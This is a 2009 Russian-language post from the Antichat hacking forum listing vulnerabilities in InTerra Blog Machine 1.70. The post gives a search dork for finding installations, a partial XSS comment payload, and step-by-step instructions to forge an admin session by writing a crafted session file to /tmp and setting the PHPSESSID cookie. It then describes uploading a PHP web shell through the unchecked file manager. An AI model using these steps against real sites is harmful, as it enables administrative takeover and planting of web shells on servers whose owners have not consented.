ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Уязвимости InTerra Blog Machine
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Уязвимости InTerra Blog Machine
  #1  
Старый 08.01.2009, 00:31
Аватар для Dimi4
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию Уязвимости InTerra Blog Machine
Уязвимости InTerra Blog Machine
Name : InTerra Blog Machine
Site : Dull.ru
Version : 1.70
Dork : "Powered by InTerra Blog Machine"

Существует хсс, но "раскрутить" до конца не получается, так как жестко фильтруется:
lib\safehtml\classes\safehtml.php

PHP код:
  // dangerous protocols
  var $BlackProtocols = array("javascript""vbscript""about""wysiwyg""data""view-source""ms-its""mhtml""shell""lynxexec""lynxcgi""hcp""ms-help""help""disk""vnd.ms.radio""opera""res""resource""chrome""mocha""livescript", ); 
Вообщем вот до чего дошол: (Добавление комент.)
Код:
<a href=`http://xek.comd" onclick='overflow'><i>wtf?<a style='font-size:30px; color:red;'>hekked</a></i>
А всё потому, что в actions\addcomment.php
PHP код:
                //prepare contents
                $comment strip_tags($_POST['comment'],"<a>,<i>,<b>"); 
Разрешины три тэги, но клас safehtml всё отрубает. Просьба кто будет смотреть присмотреться к етой хсс, возможна ли она там вообще.

Авторизация. Подмена сесии.

Всё гениально:

PHP код:
    //check access
    if(!$_SESSION['admin']){
        header("Location: " SERVER_ROOT);
        exit;
    } 
Собственно идем в /tmp
создаем сесию, права 0777:
sess_aaec41a3b692b6be0dc292e40b778595
Код:
admin|b:1;
Ну и вбиваем куку в браузере.
Цитата:
PHPSESSID=aaec41a3b692b6be0dc292e40b778595
После авторизации
Цитата:
http://127.0.0.1/interra/filemanager/
И заливаем шелл. Проверки нет (:
lib\uploader.class.php
PHP код:
        function copyFile($name,$destination){
            if(!$result move_uploaded_file($name,$destination)){
                $result copy($name,$destination);
            }
            return $result
        } 
Грузится в
Цитата:
http://127.0.0.1/interra/files/shell.php
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
Переполнение буфера в Kaspersky Anti-Virus bul666 Мировые новости 9 15.08.2009 15:08
В Windows Mobile найдено две уязвимости ground_zero Мировые новости 1 06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x GreenBear Уязвимости 6 02.03.2006 21:36
Современные информационные угрозы, четвертый квартал 2005 dinar_007 Мировые новости 3 28.01.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ